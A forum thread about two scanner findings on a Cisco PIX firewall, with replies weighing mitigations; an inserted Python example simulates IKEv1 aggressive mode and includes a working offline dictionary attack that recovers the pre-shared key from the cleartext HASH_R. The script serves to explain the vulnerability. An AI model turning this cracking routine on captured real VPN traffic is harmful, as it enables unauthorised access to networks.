716 Views, 3 Helpful, 6 Replies

Cisco PIX 7.2(2) vulnerabilities

Hello

 

Hope you are doing well, I kindly ask for your help.

 

I have a Cisco PIX Security Appliance Software Version 7.2(2) and I have detected the following vulnerabilities:

 

OUTSCAN detected one medium-risk vulnerability that is related to the Internet Key Exchange

An Internet Key Exchange service supports aggressive mode. When used in combination with pre-shared keys, aggressive mode will transmit a hash of the secret in plain text. An attacker can then do an offline brute force of that hash to retrieve the clear-text secret.

You can implement one or more of the following security policies to mitigate this:
1) Disable aggressive mode on your VPN Gateway
2) Use public key authentication instead of pre-shared keys
3) Only allow VPN connections from whitelisted addresses
4) Ensure that you have a strong pre-shared key.

OUTSCAN also detected one medium-risk vulnerability that is related to Constant IP Identification

The UDP implementation for this system keeps the IP Identification field at 0 for all non-fragmented
packets, which could allow remote attackers to determine the operating system running on the target
system. Please contact the vendor for a suitable solution.

 

For the first vulnerability, I want to know if there is some risk or a loss of service if I follow those recommendations in order to mitigate that vulnerability.

And for the second, I want to know what I can do to mitigate it.

 

Thank you for your comments.

Best regards!

Iván
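Added example (not part of the original post, and not Cisco code): a small Python model of the attack the OUTSCAN finding describes. It simulates messages 1 and 2 of an IKEv1 aggressive mode exchange with pre-shared-key authentication, following the RFC 2409 definitions of SKEYID and HASH_R, and then runs the offline dictionary attack against the HASH_R that the responder sends in the clear. The DH group is Oakley group 2; the nonces, cookies, SA payload body, responder identity and the wordlist are constructed for the demo and are not values from this thread.

```python
"""IKEv1 aggressive mode with PSK: why HASH_R on the wire is an offline crack target.

SKEYID = prf(psk, Ni_b | Nr_b)
HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)      (RFC 2409 s5.4)

In aggressive mode HASH_R travels unencrypted in message 2, and every other input
to it is also in messages 1 and 2, so a passive capture is enough to test PSK guesses.
"""
import hashlib
import hmac
import os
import secrets

# RFC 2409 Oakley group 2 (1024-bit MODP) prime and generator.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF", 16)
G = 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKE prf when SHA-1 is the negotiated hash algorithm: HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication; the PSK is the only secret input."""
    return prf(psk, ni_b + nr_b)


def hash_r(psk, ni_b, nr_b, gxr, gxi, cky_r, cky_i, sai_b, idir_b) -> bytes:
    return prf(skeyid_psk(psk, ni_b, nr_b), gxr + gxi + cky_r + cky_i + sai_b + idir_b)


def aggressive_mode_exchange(psk: bytes, idir_b: bytes) -> dict:
    """Simulate aggressive mode messages 1 and 2 and return what a sniffer sees.

    Message 1 (initiator): HDR, SA, KE, Ni, IDii
    Message 2 (responder): HDR, SA, KE, Nr, IDir, HASH_R   <- HASH_R in cleartext
    """
    xi, xr = secrets.randbits(256), secrets.randbits(256)
    msg1 = {
        "cky_i": os.urandom(8),
        # Constructed SA payload body (one proposal, one transform); contents are arbitrary here.
        "sai_b": bytes.fromhex("00000001000000010000002401010001"),
        "gxi": pow(G, xi, P).to_bytes(128, "big"),
        "ni_b": os.urandom(20),
    }
    msg2 = {
        "cky_r": os.urandom(8),
        "gxr": pow(G, xr, P).to_bytes(128, "big"),
        "nr_b": os.urandom(20),
        "idir_b": idir_b,
    }
    msg2["hash_r"] = hash_r(psk, msg1["ni_b"], msg2["nr_b"], msg2["gxr"], msg1["gxi"],
                            msg2["cky_r"], msg1["cky_i"], msg1["sai_b"], msg2["idir_b"])
    return {**msg1, **msg2}


def crack_psk(capture: dict, wordlist):
    """Offline dictionary attack on a captured HASH_R. Nothing is sent to the gateway,
    so no lockout, rate limit or log entry on the PIX can notice it."""
    for candidate in wordlist:
        guess = hash_r(candidate.encode(), capture["ni_b"], capture["nr_b"], capture["gxr"],
                       capture["gxi"], capture["cky_r"], capture["cky_i"],
                       capture["sai_b"], capture["idir_b"])
        if hmac.compare_digest(guess, capture["hash_r"]):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed responder identity: ID_IPV4_ADDR (type 1), proto 17, port 500, 203.0.113.1
    idir = b"\x01\x11\x01\xf4" + bytes([203, 0, 113, 1])
    cap = aggressive_mode_exchange(b"Winter2014", idir)
    print("HASH_R seen on the wire:", cap["hash_r"].hex())
    print("recovered PSK:", crack_psk(cap, ["cisco", "password", "Winter2014"]))
```

Two points follow from the model. A long random PSK (recommendation 4) only makes the loop in crack_psk infeasible; the hash is still exposed, which is why the scanner still flags it. In main mode HASH_R is sent in message 6 under the ISAKMP SA's encryption, so a passive capture does not yield it; on PIX/ASA 7.x aggressive mode is switched off globally with `crypto isakmp am-disable` (a platform fact, not something from the thread), and IPsec remote-access clients that authenticate with a group pre-shared key depend on aggressive mode, which is the loss of service the accepted answer below warns about.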

 

Accepted Solution

Tushar Bangia
Level 1

Hi Ivan,

 

Please find the explanation to your query as below:

 

Vulnerability 1:

Aggressive mode does not give identity protection of the two IKE peers, unless digital certificates are used. This means VPN peers exchange their identities without encryption (clear text). The above vulnerability is confirming this behavior.

 

With the use of digital certificates we can encrypt the identity information of VPN peers hence make the Phase 1 negotiation secure for Aggressive mode.

 

Refer below link for more information on setting up authentication with digital certificate:

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

Risks as per the above recommendation:

1) Disable aggressive mode on your VPN Gateway

If you disable aggressive mode then the remote access VPN clients would not be able to connect.

2) Use public key authentication instead of pre-shared keys
 

This is a viable solution to get rid of this vulnerability; however, this would also entail changes in the VPN implementation.

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

3) Only allow VPN connections from whitelisted addresses

I believe this would be very difficult to implement, as it is almost impossible to track or create a whitelist for the source IPs of remote access VPN clients.

 

4) Ensure that you have a strong pre-shared key.

Having a strong pre-shared key can delay the brute force attack; however, it does not completely remediate the vulnerability.

 

Vulnerability 2:

It refers to OS fingerprinting, i.e. a remote scanning tool may be able to identify the OS running on the device. 

 

One remediation I could think of is placing an IPS in front of the firewall; however, this would also involve design changes, hence I would also request you to wait for other experts to answer on this.

 

Regards,

 

Tushar Bangia

 

Please rate this post if you find this helpful.

 

 

 

 


6 Replies

Hi Tushar

Thank you very much for your useful comments. So, in my understanding, for the first vulnerability the fourth recommendation is the simplest and quickest to implement, right?

For the second, I will discuss with my client the possibility of placing an IPS; I will also follow your recommendation of waiting for more answers.

Thank you again and regards!

Iván

Hi Ivan,

 

As per the four options, the 4th one seems to be the most simple to implement; however, I wish to reiterate that this is not the best option. Option number 2 is the best possible remediation for the vulnerability.

 

Regards,

 

Tushar Bangia

 

 

Please rate the post if you find it helpful..

Hi Ivan,

 

I also second Marvin's recommendations, as the firewall you are working with, i.e. the PIX, is end of engineering and hence there isn't any development team working to fix the code anomalies/vulnerabilities.

 

Regards,

Tushar Bangia

 

Please rate the post if you find it helpful..

 

Marvin Rhoads
Hall of Fame

I would add that if it is important enough for your business to audit the perimeter security they should consider investing in a current generation firewall with a more secure overall profile and options for configuring the system to mitigate vulnerabilities consistent with your security requirements.

The PIX was end-of-sale in 2008. Your options for upgrading software are very limited and support is no longer available.

 

Hello Marvin

Thanks for your comments, you are right; that is why, in parallel to these issues, we are considering implementing an ASA, but first we need to try to mitigate these vulnerabilities.

Best regards!

Iván
